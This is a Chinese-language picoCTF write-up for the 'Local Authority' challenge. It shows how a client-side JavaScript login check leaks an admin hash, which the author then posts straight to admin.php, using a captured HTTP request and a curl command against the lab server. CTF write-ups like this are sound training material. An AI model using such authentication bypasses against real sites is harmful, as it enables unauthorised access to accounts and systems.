picoCTF Local Authority

## 首頁(其他picoCTF writeup) https://hackmd.io/@sunfrancis12/ry_LLAgp3 作者: [台中教育大學白帽社](https://hackmd.io/@ntcuhack/index) -sunfrancis12 ## Local Authority 這題超簡單一進來就看到一個登入頁面，一進來就先試著登入 ![](https://hackmd.io/_uploads/HyxHkjHan.png) 登入失敗了... ![](https://hackmd.io/_uploads/B1rUyiBah.png) 老樣子f12，點開resources，發現一個叫做secure.js的黨案，點進去 ~~到這一步其實大家都知道了~~ ![](https://hackmd.io/_uploads/H1EY1jrp2.png) 再點開login.php看看 ``` window.username = "sdds"; window.password = "sds"; usernameFilterPassed = filter(window.username); passwordFilterPassed = filter(window.password); if ( usernameFilterPassed && passwordFilterPassed ) { loggedIn = checkPassword(window.username, window.password); if(loggedIn){ document.getElementById('msg').innerHTML = "Log In Successful"; document.getElementById('adminFormHash').value = "2196812e91c29df34f5e217cfd639881"; document.getElementById('hiddenAdminForm').submit(); }else{ document.getElementById('msg').innerHTML = "Log In Failed"; } }else { document.getElementById('msg').innerHTML = "Illegal character in username or password." } ``` 看來我們的猜想是對的(笑 ``` loggedIn = checkPassword(window.username, window.password); ``` ## 補充:方法二 curl 這題也可以用curl去解喔!! 看一下login.php的程式碼(上面的程式片段沒有)，可以發現它會將adminFormHash的value放到name為hash的input裡，並POST到admin.php ``` <form hidden action="admin.php" method="post" id="hiddenAdminForm"> <input type="text" name="hash" required id="adminFormHash"> </form> ...中間跳過... if(loggedIn){ document.getElementById('msg').innerHTML = "Log In Successful"; document.getElementById('adminFormHash').value = "2196812e91c29df34f5e217cfd639881"; document.getElementById('hiddenAdminForm').submit(); } ``` POST 到admin.php的封包內容如下(擷取自burp) ``` POST /admin.php HTTP/1.1 Host: saturn.picoctf.net:50920 Content-Length: 37 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://saturn.picoctf.net:50920 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://saturn.picoctf.net:50920/login.php Accept-Encoding: gzip, deflate Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close hash=2196812e91c29df34f5e217cfd639881 ``` 我們就可以用curl的方式，夾帶data並POST到admin.php ``` curl -X POST http://saturn.picoctf.net:50920/admin.php --data hash=2196812e91c29df34f5e217cfd639881 ```